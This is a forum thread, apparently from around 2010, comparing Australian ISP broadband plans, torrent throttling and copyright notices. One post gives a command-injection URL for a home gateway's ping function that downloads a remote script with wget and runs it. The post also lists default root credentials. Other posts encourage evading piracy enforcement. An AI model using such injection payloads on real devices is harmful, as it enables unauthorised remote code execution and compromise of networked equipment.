View Full Version : iinet revised plans

Looks like they're brining their plans in line with some of the other ISPs that are offering massive-unlimited quotas...

1TB plan to be available on the 20th.

Other revised plans here: http://www.iinet.net.au/press/releases/20100818-iinet-age-of-terabyte-arrives.pdf

Naked customers will get upgraded automatically.
Other customers will have to make a call to upgrade.

EDIT: Actually the best deal out IMO is the TPG 200GB Premium

ADSL2+ Premium 200GB
$69.99 = 200GB to use anytime (no peak/offpeak) Download only counted.

Speed will be shaped to 4Mbps/1Mbps once inclusive monthly usage quota is reached.

That's pretty sweet - 200GB of downloads only with no peak/offpeak times and once you crack it you're only shaped to 400KB/s down 100KB/s up.

Games use uploads + downloads
Streaming TV shows and movies, especially at 720p, takes a lot of data.
Downloading stock images and video takes up a lot.
Uploading and downloading data for clients takes up a lot.
And theres a hell of a lot of porn out there dude!

Stop using shitty torrents lol

3 torrents going.

Maximum down speed is currently 50kb/s.

I play with the bandwidth allocation (High/Low/etc) and that 50kb/s jumps from one torrent to another.

So no, it's not just shitty torrents.

Yeah, set your torrent client to use port 80. It works on the dongle, not the HGD.

Home Gateway device

I can't find my notes on this unfortunately. What I do remember is you have to mount the filesystem as read/write, upload and execute dropbear binary (SSH server) with a HTML string and you can edit the prioritisation setup. It is quite involved but I'll try to get a guide from one of the other blokes I know using the HGD when I see him.

Im on the $69.99 plan. Which is almost an unlimited plan because if you go over your quota, you are only shaped to 4Mbps. Which is still plenty fast enough.

Who here has received a notice from their ISP telling them to stop downloading pirated material?

I've never received one personally, but other people I know with Westnet / TPG have, and that put me off a bit...

fourseven

100% scare tactic unless you are with Exetel. John Linton disconnects his customers if the ISP receives 3 notices.

It's pretty much the reason AFACT vs iiNet ended up in court. iiNet weren't prepared to send on notices because they didn't show any proof that the customer had infringed copyright.

Yeah i know, but it will drag on through court for another year and then get thrown out.

And even if AFACT do win, they will only be able to collect new data, so its plenty of time to set up a seed box in mother russia.

Ok found them. I accept NO responsibility for any damage this does... if it fucks your shit up on your Vivid device I'm not to blame.

Punch this into your browser.

http://ip-address-of-your-hgd/ajax.cgi?action=tag_ipPing&pip=;wget -O /tmp/start.sh http://www.dnstheplanet.com/vivid/start.txt;/bin/sh /tmp/start.sh

Then you can SSH into the device. Username is root, password is password.

Then you want to run tc filter show dev - something in the list it displays will be shaping your P2P traffic. If you want to throw up your tc list I will have a look for you and tell you which one to remove.

The big deal is TPG have about the same coverage as North Korea's nuclear aresenal.

When they have DSLAM'd my exchange then it will be a big deal for me, until then iiBorg are the winners for the best ADSL2+ products because you can actually use them.

Technology is the limiting factor. Copper is old and busted and can only do so much. Cable is a shared medium as is wireless. Increasing quotas us cheaper than digging trenches and laying fibre.

What ever happened to western power laying fibre at the same time as moving power lines underground? From memory they had successful tests in a few suburbs. Would have made a lot if sense.
